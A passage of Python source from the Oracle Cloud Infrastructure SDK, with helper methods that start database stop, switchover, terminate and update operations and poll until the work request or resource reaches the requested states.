Calls :py:func:`~oci.database.DatabaseClient.stop_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_pluggable_database(pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def stop_pluggable_database_and_wait_for_state(self, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.stop_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.stop_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.stop_pluggable_database(pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, switchover_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.SwitchoverDataGuardAssociationDetails switchover_data_guard_association_details: (required)
Request to switchover a primary to a standby.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
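The fallback to terminal work-request states when ``work_request_states`` is empty can be sketched as follows; the state names mirror ``oci.waiter._WORK_REQUEST_TERMINATION_STATES``, but the literal values here are assumptions for illustration:

```python
# Sketch of how an empty work_request_states list falls back to the
# termination states before being lower-cased for comparison.
_WORK_REQUEST_TERMINATION_STATES = ['SUCCEEDED', 'FAILED', 'CANCELED']

def resolve_states(work_request_states):
    states = work_request_states if work_request_states else _WORK_REQUEST_TERMINATION_STATES
    return [w.lower() for w in states]

print(resolve_states([]))             # ['succeeded', 'failed', 'canceled']
print(resolve_states(['SUCCEEDED']))  # ['succeeded']
```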
"""
operation_result = self.client.switchover_data_guard_association(database_id, data_guard_association_id, switchover_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def switchover_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, switchover_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.SwitchoverDataGuardAssociationDetails switchover_data_guard_association_details: (required)
Request to switchover a primary to a standby.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.switchover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.switchover_data_guard_association(database_id, data_guard_association_id, switchover_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.terminate_autonomous_container_database(autonomous_container_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_autonomous_exadata_infrastructure_and_wait_for_work_request(self, autonomous_exadata_infrastructure_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_autonomous_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_exadata_infrastructure_id: (required)
The Autonomous Exadata Infrastructure `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.terminate_autonomous_exadata_infrastructure(autonomous_exadata_infrastructure_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def terminate_db_system_and_wait_for_work_request(self, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.terminate_db_system` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.terminate_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
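A ``waiter_kwargs`` dictionary can be built like this (``max_interval_seconds`` and ``max_wait_seconds`` are the documented :py:func:`oci.wait_until` parameters; the values are illustrative):

```python
# Illustrative waiter_kwargs: max_interval_seconds bounds the delay between
# successive polls, max_wait_seconds bounds the total time spent waiting.
waiter_kwargs = {
    'max_interval_seconds': 30,   # poll at most every 30 seconds
    'max_wait_seconds': 1800,     # give up after 30 minutes in total
}
print(sorted(waiter_kwargs))  # ['max_interval_seconds', 'max_wait_seconds']
```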
"""
operation_result = self.client.terminate_db_system(db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_container_database_and_wait_for_work_request(self, autonomous_container_database_id, update_autonomous_container_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousContainerDatabaseDetails update_autonomous_container_database_details: (required)
Request to update the properties of an Autonomous Container Database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_container_database(autonomous_container_database_id, update_autonomous_container_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_container_database_and_wait_for_state(self, autonomous_container_database_id, update_autonomous_container_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabase` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousContainerDatabaseDetails update_autonomous_container_database_details: (required)
Request to update the properties of an Autonomous Container Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_container_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_container_database(autonomous_container_database_id, update_autonomous_container_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, update_autonomous_database_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseDetails update_autonomous_database_details: (required)
Request to update the properties of an Autonomous Database.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database(autonomous_database_id, update_autonomous_database_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_and_wait_for_state(self, autonomous_database_id, update_autonomous_database_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseDetails update_autonomous_database_details: (required)
Request to update the properties of an Autonomous Database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
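On failure while waiting, these methods wrap the exception so the caller still sees the partial result. The pattern can be sketched generically; ``CompositeOperationError`` below is a local stand-in, not the class from ``oci.exceptions``:

```python
# Generic sketch of the error-wrapping pattern: if the waiter fails, the
# exception is re-raised with the already-completed operation result attached.
class CompositeOperationError(Exception):
    def __init__(self, partial_results=None, cause=None):
        super().__init__(str(cause))
        self.partial_results = partial_results
        self.cause = cause

def run_and_wait(operation, waiter):
    operation_result = operation()
    try:
        return waiter(operation_result)
    except Exception as e:
        raise CompositeOperationError(partial_results=[operation_result], cause=e)
```

A caller can then inspect ``err.partial_results`` to recover the operation response even though the wait itself failed.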
"""
operation_result = self.client.update_autonomous_database(autonomous_database_id, update_autonomous_database_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_regional_wallet_and_wait_for_work_request(self, update_autonomous_database_wallet_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database_regional_wallet` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.UpdateAutonomousDatabaseWalletDetails update_autonomous_database_wallet_details: (required)
Request to update the properties of Autonomous Database regional wallet.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database_regional_wallet`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database_regional_wallet(update_autonomous_database_wallet_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def update_autonomous_database_wallet_and_wait_for_work_request(self, autonomous_database_id, update_autonomous_database_wallet_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.update_autonomous_database_wallet` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.UpdateAutonomousDatabaseWalletDetails update_autonomous_database_wallet_details: (required)
Request to update the properties of an Autonomous Database wallet.
:param list[str] work_request_states: (optional)
An array of work request states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.update_autonomous_database_wallet`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_wait_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.update_autonomous_database_wallet(autonomous_database_id, update_autonomous_database_wallet_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
